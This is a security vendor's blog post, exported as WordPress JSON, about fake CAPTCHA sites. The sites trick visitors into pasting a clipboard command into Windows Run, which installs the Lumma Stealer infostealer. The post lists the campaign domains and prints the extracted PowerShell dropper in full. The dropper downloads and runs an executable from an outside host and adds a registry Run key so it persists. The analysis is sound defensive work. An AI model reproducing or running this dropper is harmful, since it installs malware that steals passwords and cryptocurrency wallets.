{"id":27162,"date":"2024-09-21T22:20:07","date_gmt":"2024-09-21T22:20:07","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=27162"},"modified":"2024-11-03T21:20:54","modified_gmt":"2024-11-03T21:20:54","slug":"fake-captcha-sites-malicious-code-lumma-stealer","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/fake-captcha-sites-malicious-code-lumma-stealer\/","title":{"rendered":"Fake CAPTCHA Sites Trick Users to Run Malicious Code, Install Lumma Stealer"},"content":{"rendered":"

New malware spreading campaign now picks up steam on the Internet, luring users to fake CAPTCHA websites<\/strong>. People are asked to press certain key combinations to prove they are not robot and get infected with malware in the end. As the analysis shows, the virus that installs in such a way is Lumma Stealer. Let\u2019s have a deeper look at how this works and how you can protect yourself.<\/p>\n

Lumma Stealer from a fake CAPTCHA check: Campaign overview<\/h2>\n

On September 20, quite a few analysts pointed at a rather unusual malware-spreading campaign, taking place on fake CAPTCHA websites. Hackers establish this landing and create a redirect from a dodgy website. Our observations led to a chain of pages that offer pirated movies; we met the same sites in other redirection campaigns<\/a>, though with less worrying consequences. However, domains, where fraudulent anti-robot checks happen, are newly established.<\/p>\n

\"Fake
Example of a fake CAPTCHA website<\/figcaption><\/figure>\n

List of fake CAPTCHA domains<\/h3>\n
\n\n\n\n\n<\/thead>\n\n\n\n\n\n
URL<\/th>\nAnalysis<\/th>\n
stage-second-v2c.b-cdn[.]net<\/td>\nScan Report<\/a><\/td>\n<\/tr>\n
antibotx.b-cdn[.]net<\/td>\nScan Report<\/a><\/td>\n<\/tr>\n
bostfick.b-cdn[.]net<\/td>\nScan Report<\/a><\/td>\n<\/tr>\n
fuse19.b-cdn[.]net<\/td>\nScan Report<\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n

What these landing pages do is ask for human verification by doing a sequence of key combinations. The list of demanded combos appears as the victim clicks the \u201cI am not a robot\u201d button and states the following:<\/p>\n

Press Windows Button (Win+R)
\nPress CTRL + V
\nPress Enter
\n<\/code><\/p>\n

The trick here is that the site pastes malicious code into clipboard upon opening<\/strong>. Key combinations call for the Windows Run application to start, with further pasting the command into the window and running it with PowerShell. That is what launches the malware injection process.<\/p>\n

\"Malicious<\/p>\n

We extracted the command one of these sites uses<\/strong>, and it does not look too complicated. It contains a rather straightforward instruction: download a file from a remote server to a specific directory and run it. All the unintelligible sequences of symbols are base64-encoded parts of the command, that make it harder to detect for antiviruses. Each of these sequences correspond to addresses and paths in the system.<\/p>\n

$BCKUinyM='https:\/\/finalsteptogo[.]com\/uploads\/tera14.zip'; $bpshwy7J=$env:APPDATA+'\\WycT1ndu'; $EIjUwZlK=$env:APPDATA+'\\yURiiySE.zip'; $avcKTKQb=$bpshwy7J+'\\Set-up.exe'; if (-not (teSt-PATh $bpshwy7J)) { neW-iTeM -Path $bpshwy7J -ItemType Directory }; sTART-bItstransfEr -Source $BCKUinyM -Destination $EIjUwZlK; EXpAnD-arChiVE -Path $EIjUwZlK -DestinationPath $bpshwy7J -Force; rEmOVE-ItEM $EIjUwZlK; STArT-procEsS $avcKTKQb; neW-IteMPROPeRTY -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'Ww5EqxGa' -Value $avcKTKQb -PropertyType 'String';<\/code><\/p>\n

Consequences<\/h2>\n

As I\u2019ve mentioned in the introduction, this campaign targets at spreading Lumma Stealer<\/a>, a prolific malware that emerged in early 2024. It quickly became one of the leading malicious programs in volume of attacks, primarily targeting individuals. Typically for modern infostealers, Lumma gathers passwords to online accounts and desktop apps, paying special attention to cryptocurrency wallets. Though what makes this virus unique is the internal design, that does its best at avoiding anti-malware detection.<\/p>\n

Such sophisticated campaigns are not a novelty for Lumma Stealer.<\/strong> Before, it was tucked into pirated games and software that were promoted on a hijacked YouTube channel<\/a>. Its masters also seemingly try to strike on each major news happening around the gaming or software industry.<\/p>\n

How to Protect Yourself?<\/h2>\n

As always, avoiding the threat is the best protection<\/strong>. Poking around on sketchy sites may look safe, but its danger will surface, sooner or later. Stopping any visits and interactions with pages that redirect you or show excessive amounts of ads will decrease the risk by orders of magnitude.<\/p>\n

Not sure whether you can trust the site? Consider scanning it on our website reputation checker<\/a>! It goes through the entire website, checking its contents\u2019 safety by a selection of parameters. Just 15 seconds \u2013 and you will know exactly whether the website is trustworthy.<\/div><\/div>\n

Though, malware sometimes hits from an unexpected angle. And for this case, a reliable anti-malware software is needed. GridinSoft Anti-Malware will get you covered: its advanced network security and heuristic protection repels even the most evasive threats.<\/p>\n

\"Fake<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

New malware spreading campaign now picks up steam on the Internet, luring users to fake CAPTCHA websites. People are asked to press certain key combinations to prove they are not robot and get infected with malware in the end. As the analysis shows, the virus that installs in such a way is Lumma Stealer. Let\u2019s […]<\/p>\n","protected":false},"author":7,"featured_media":27174,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[15],"tags":[619,28,40],"class_list":{"0":"post-27162","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-security-news","8":"tag-cybersecurity","9":"tag-malware","10":"tag-online-security"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/09\/fake-captcha-sites.webp","author_info":{"display_name":"Stephanie Adlam","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/adlam\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/27162","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=27162"}],"version-history":[{"count":15,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/27162\/revisions"}],"predecessor-version":[{"id":28064,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/27162\/revisions\/28064"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/27174"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=27162"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=27162"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=27162"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}